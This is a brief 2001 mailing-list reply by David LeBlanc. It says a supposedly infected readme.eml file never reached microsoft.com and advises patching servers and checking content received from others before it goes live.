RE: Please tell me I'm wrong: microsoft.com infected

From: David LeBlanc (dleblancat_private)
Date: Wed Sep 19 2001 - 20:07:15 PDT

    Though you might notice that the readme.eml never made it to the web
    site, so it won't actually get anyone - just good for stirring people
    up.

    Lesson here is that you not only have to make sure your servers are
    patched, but you might want to quickly check content that other
    propogate to you before you make it live 8-)